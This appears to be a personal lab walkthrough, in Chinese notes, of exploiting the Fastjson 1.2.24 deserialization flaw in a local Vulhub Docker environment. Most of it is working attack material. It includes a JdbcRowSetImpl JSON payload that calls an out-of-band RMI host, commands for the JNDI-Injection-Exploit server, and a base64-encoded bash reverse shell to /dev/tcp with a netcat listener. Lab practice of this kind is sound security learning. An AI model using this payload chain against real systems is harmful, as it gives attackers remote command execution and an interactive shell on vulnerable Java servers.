https://vulhub.org/#/environments/fastjson/1.2.24-rce/
cd /home/kali/vulhub/fastjson/1.2.24-rce
sudo docker-compose up -d
sudo docker-compose ps -a
sudo docker ps -a
fastjson 1.2.24
访问页面http://192.168.225.166:8090/
,返回json字符串
{
"name":"test",
"age": 18
}
https://github.com/Maskhe/FastjsonScan
下载项目中的FastjsonScan.jar文件
在burp的Extender->Extensions栏,点击Add,选择下载好的jar文件就可以了(执行环境是Java)
如果成功安装,会输出如下信息,如果未能成功安装可以换下jdk版本??我用的1.8
使用方法也很简单,就像使用repeater一样,你可以在burp的任何地方选中一个请求右键选择【Send to FastjsonScan】将这个请求发送到Fastjson Scan,然后就只需要等待扫描结束
{"handsome":{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://weedjc37lvb2aq0bw6k08gkax13rrg.oastify.com/aaa","autoCommit":true}}
http://dnslog.cn/ # 获取新的地址 5z5srb.dnslog.cn
JNDI,Java Nameing and Directory Interface,Java 命令与目录接口,是一组应用程序接口,目的是为了方便查找远程或本地对象。JNDI 典型的应用场景是配置数据源,除此之外,JNDI 还可以访问现有的目录和服务,例如LDAP| RMI| CORBA| DNS| NDS| NIS
https://github.com/welk1n/JNDI-Injection-Exploit
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
要确保 1099、1389、8180端口可用,不被其他程序占用
┌──(kali💋kali)-[~/tools]
└─$ proxychains git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
┌──(kali💋kali)-[~/tools/java-unserialize/JNDI-Injection-Exploit/target]
└─$ pwd
/home/kali/tools/java-unserialize/JNDI-Injection-Exploit/target
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/test" -A "192.168.225.166"
rmi://192.168.225.166:1099/jv0kge
rmi://192.168.225.166:1099/vqmpi8
ldap://192.168.225.166:1389/vqmpi8
rmi://192.168.225.166:1099/kdhm9b
ldap://192.168.225.166:1389/kdhm9b
sudo docker ps -a
sudo docker exec -it 532 /bin/bash
nc -lvvp 6666 # 开启监听6666端口服务
----------------------------------
bash -i >& /dev/tcp/192.168.225.166/6666 0>&1
----------------------------------
bash -i >& /dev/tcp/192.168.225.166/6666 0>&1 转成base64位:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPiYx
----------------------------------
bash -c {echo,base64编码一句话shell}|{base64,-d}|{bash,-i}
--------------
最后组合为
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}
----------------------------------
输入java指令:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.225.166"
bash -i &> /dev/tcp/192.168.225.166/6666 0<&1 # 反弹交互指令tcp服务
nc -lvp 6666 # l是监听模式;v是显示详细信息;p是指定端口;
nc -lvvp 6666
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.225.166"